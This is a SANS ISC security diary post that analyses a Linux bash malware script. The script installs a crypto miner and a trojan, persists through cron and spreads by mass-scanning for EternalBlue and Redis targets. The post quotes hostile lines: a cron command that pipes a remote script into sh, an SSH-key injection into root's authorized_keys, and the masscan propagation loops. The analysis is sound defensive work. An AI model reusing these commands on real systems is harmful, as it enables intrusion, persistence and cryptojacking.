My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Malicious Bash Script with Multiple Features

Published: 2018-03-05. Last Updated: 2018-03-05 10:22:49 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

It’s not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one has been spotted by @michalmalik[1] who twitted about it. I had a quick look at it. The script has currently a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. 'apt-get' and 'yum'  are used, this means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performances, the number of CPUs is tested:

if [ $cpunum -gt 4 ];
then
threads=`expr $cpunum / 2`
else
threads=$cpunum

Three first files are downloaded:

hxxp://xksqu4mj.fri3nds[.]in/tools/clay
hxxp://xksqu4mj.fri3nds[.]in/tools/minerd
hxxp://xksqu4mj.fri3nds[.]in/tools/glibc-2.14.tar.gz

'clay' is a known trojan[3]. 'minerd' is, as the name says, a crypto miner[4]. This is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://pool.fri3nds.in:8080

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/transfer.sh | sh" > /var/spool/cron/root

The nasty stuff is the installation of the attack SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!

Then, Redis via port TCP/6379 (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save

The next step is to download the 'masscan' port scanner and another bunch of scripts:

hxxps://github[.]com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
hxxp://xksqu4mj.fri3nds[.]in/tools/unixinfect.tar.gz

The tar file contains scripts which generate ranges of IP addresses and scan for EternalBlue[4] vulnerable hosts (Windows hosts):

#!/bin/bash
ython rangeip.py
while read line
do
    masscan -p445 $line --rate=20000 | tee -a masscan
    python order.py
    sh ebrun.sh
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

#!/bin/bash
python rangeip.py
while read line
do
    masscan -p6379 $line --rate=20000 | tee -a masscan
    python order.py
    sh redisrun.sh
done < ip

The goal is to find new vulnerable hosts, pivot (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].

[1] https://twitter.com/michalmalik/status/969634267532873728
[2] https://www.virustotal.com/en/file/ae71d81ed3a1f9a9f83c2973184dd6ab51ca4b5728ccfbab9885399e54379274/analysis/
[3] https://www.virustotal.com/intelligence/search/?query=260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79
[4] https://www.virustotal.com/intelligence/search/?query=2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2
[5] https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
[6] https://twitter.com/michalmalik

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments

Is "ython" something or is there actually a missing "p" in one of those scripts? Makes you wonder how it happened...
It's a typo (probably when I copy/paste the code and formated it to fit in the diary)

Diary Archives